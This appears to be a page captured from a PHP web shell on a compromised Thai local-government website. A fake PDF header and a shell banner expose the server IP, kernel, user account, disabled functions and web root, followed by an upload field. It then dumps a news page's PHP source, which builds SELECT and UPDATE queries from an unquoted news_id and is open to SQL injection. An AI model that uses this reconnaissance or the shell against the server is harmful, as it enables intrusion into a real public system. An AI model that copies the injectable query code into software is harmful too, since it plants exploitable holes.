%PDF-1.5 % ºaâÚÎΞ-ÌE1�ØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY
| Server IP : 122.155.177.87 / Your IP : 122.155.177.87 Web Server : Apache/2 System : Linux cat177-87.static.lnwhostname.com 3.10.0-1160.62.1.el7.x86_64 #1 SMP Tue Apr 5 16:57:59 UTC 2022 x86_64 User : phunphin ( 1164) PHP Version : 5.3.29 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,putenv,eval MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/phunphin/domains/phunphin.go.th/public_html/calendar/ |
Upload File : |
<?php require_once('../admin/Connections/conndb.php'); ?>
<?php
$colname_Recordset1 = "-1";
if (isset($_GET['news_id'])) {
$colname_Recordset1 = (get_magic_quotes_gpc()) ? $_GET['news_id'] : addslashes($_GET['news_id']);
}
mysql_select_db($database_conndb, $conndb);
$query_Recordset1 = sprintf("SELECT * FROM news WHERE news_id = %s", $colname_Recordset1);
$Recordset1 = mysql_query($query_Recordset1, $conndb) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);
$totalRows_Recordset1 = mysql_num_rows($Recordset1);
$detail=$row_Recordset1["story_text"];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><!-- InstanceBegin template="/Templates/template_a.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<!-- InstanceEndEditable -->
<?php
require_once('../admin/Connections/conndb.php');
mysql_select_db($database_conndb, $conndb);
?>
<title>ͧ¤ì¡ÒúÃÔËÒÃÊèǹµÓºÅ¾Ø¹¾Ô¹ µÓºÅ¾Ø¹¾Ô¹ ÍÓàÀ;ع¾Ô¹ ¨Ñ§ËÇÑ´ÊØÃÒÉ®Ãì¸Ò¹Õ : http://www.phunphin.go.th</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../styles.css" rel="stylesheet" type="text/css">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<!-- You can use Open Graph tags to customize link previews.
Learn more: https://developers.facebook.com/docs/sharing/webmasters -->
<meta property="og:url" content="https://www.your-domain.com/your-page.html" />
<meta property="og:type" content="website" />
<meta property="og:title" content="Your Website Title" />
<meta property="og:description" content="Your description" />
<meta property="og:image" content="https://www.your-domain.com/path/image.jpg" />
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color:#006cd8;
}
-->
</style>
<!--styles -->
<link href="../styles.css" rel="stylesheet" type="text/css" />
<!--styles -->
<style type="text/css">
<!--
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
.style1 {color: #000000}
-->
</style>
<!--font-->
<link href="https://fonts.googleapis.com/css?family=Chakra+Petch|Kanit|Pridi&display=swap" rel="stylesheet">
<!--font-->
<style type="text/css">
<!--
.style4 {font-family: 'Chakra Petch', sans-serif}
-->
</style>
</head>
<body background="../images/0bg1_edit01.png" style="background-repeat:no-repeat; background-position:top">
<!-- content -->
<div align="center">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="605" align="center" valign="top"> </td>
</tr>
<tr>
<td height="55" align="center" valign="top"><table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><a href="http://www.phunphin.go.th/index.php"><img src="../images/1menutop_01.png" alt=""/></a></td>
</tr>
</table></td>
</tr>
<tr>
<td align="center"> </td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
<tr>
<td align="center" valign="top">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top">
<table width="1000" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><img src="../images/bg_con2_01.png" width="100"></td>
</tr>
<tr>
<td align="center" valign="top" background="../images/bg_con2_02.png" style="background-repeat:repeat; background-position:top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="top"><!-- InstanceBeginEditable name="EditRegion3" -->
<table width="95%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="title2"><div align="center"><img src="../images/bnh24.png"></div></td>
</tr>
<tr>
<td class="title2"><div align="center">
<?
mysql_query("update news set click=click+1 where news_id =$news_id");
if($row_Recordset1['news_type']== "information"){
echo "<img src='../images/information.gif'>";
}
else if($row_Recordset1['news_type']== "procedure"){
echo "<img src='../images/price.gif'>";
}
else if($row_Recordset1['news_type']== "book"){
echo "<img src='../images/book.gif'>";
}
else if($row_Recordset1['news_type']== "report"){
echo "<img src='../images/report.gif'>";
}
else if($row_Recordset1['news_type']== "statement"){
echo "<img src='../images/statement.gif'>";
}
else if($row_Recordset1['news_type']== "plan_4"){
echo "<img src='../images/plan_4.gif'>";
}
else if($row_Recordset1['news_type']== "danger"){
echo "<img src='../images/danger.gif'>";
}
else if($row_Recordset1['news_type']== "load_1"){
echo "<img src='../images/load_1.gif'>";
}
else if($row_Recordset1['news_type']== "load_2"){
echo "<img src='../images/load_2.gif'>";
}
else if($row_Recordset1['news_type']== "load_3"){
echo "<img src='../images/load_3.gif'>" ;
}
else if($row_Recordset1['news_type']== "load_4"){
echo "<img src='../images/load_4.gif'>";
}
else if($row_Recordset1['news_type']== "load_5"){
echo "<img src='../images/load_5.gif'>";
}
else if($row_Recordset1['news_type']== "load_6"){
echo "<img src='../images/load_6.gif'>";
}
else if($row_Recordset1['news_type']== "load_7"){
echo "<img src='../images/load_7.gif'>";
}
else if($row_Recordset1['news_type']== "load_8"){
echo "<img src='../images/load_8.gif'>Õ";
}
else{
echo "<img src='../images/job.gif'>";
}
?>
</div></td>
</tr>
<tr>
<td><div align="center">
<table width="700" border="0" cellpadding="2" cellspacing="1" class="box-center">
<tr>
<td height="25" background="../images/bg4.gif" class="styles">
<div align="center">àÃ×èͧ : <span class="detail"><?php echo $row_Recordset1['headline']; ?></span></div></td>
</tr>
<tr>
<td valign="top" class="styles1"> <span class="styles4">ÃÒÂÅÐàÍÕ´ :</span> <span class="detail"><?php echo nl2br($detail); ?></span></td>
</tr>
<?php if ($row_Recordset1['filename'] <> "") {?>
<tr>
<td height="25" valign="top" class="styles1"> <span class="styles4">ÃÒÂÅÐàÍÕ´à¾ÔèÁàµÔÁ :</span> <a href="doc_download/<?php echo $row_Recordset1['filename']; ?>" target="_blank" class="styles2"><img src="images/download.gif" alt="´ÒǹìâËÅ´àÍ¡ÊÒÃ" width="20" height="22" border="0" align="absmiddle" /></a> <a href="doc_download/<?php echo $row_Recordset1['filename']; ?>" target="_blank" class="styles2">´ÒǹìâËÅ´àÍ¡ÊÒà </a></td>
</tr>
<?php } ?>
<tr>
<td> </td>
</tr>
<tr>
<td><div align="right"><span class="styles1">»ÃСÒÈàÁ×èÍ :</span> <span class="styles2"><? $d=explode("-",$row_Recordset1['created']);
$dd=$d[2];
$mm=$d[1];
switch($mm)
{
case "1":
$printmonth = "Á.¤.";
break;
case "2":
$printmonth = "¡.¾.";
break;
case "3":
$printmonth = "ÁÕ.¤.";
break;
case "4":
$printmonth = "àÁ.Â.";
break;
case "5":
$printmonth = "¾.¤.";
break;
case "6":
$printmonth = "ÁÔ.Â.";
break;
case "7":
$printmonth = "¡.¤.";
break;
case "8":
$printmonth = "Ê.¤.";
break;
case "9":
$printmonth = "¡.Â.";
break;
case "10":
$printmonth = "µ.¤.";
break;
case "11":
$printmonth = "¾.Â.";
break;
case "12":
$printmonth = "¸.¤.";
break;
}
$yyyy=$d[0];
$yy=$yyyy+543;
echo $dd." ".$printmonth." ".$yy; ?> </span> </div></td>
</tr>
</table>
</div></td>
</tr>
<tr>
<td> </td>
</tr>
</table>
<!-- InstanceEndEditable --></td>
</tr>
<tr>
<td align="center" valign="top"> </td>
</tr>
</table></td>
</tr>
<tr>
<td align="center" valign="top"><img src="../images/bg_con2_04.png" width="1000"></td>
</tr>
</table> </td>
</tr>
</table> </td>
</tr>
</table>
</div>
<!-- end_content -->
<tr><td><a style="display:scroll;position:fixed;bottom:5px;right:5px;" class="backtotop" href="#top" rel="nofollow" title="Back to Top"><img src="../images/up.png" border="0" /></a></td>
</tr>
</body>
<!-- InstanceEnd --></html>
<?php
mysql_free_result($Recordset1);
if($conndb)
{
mysql_close($conndb);
unset($conndb);
}
?>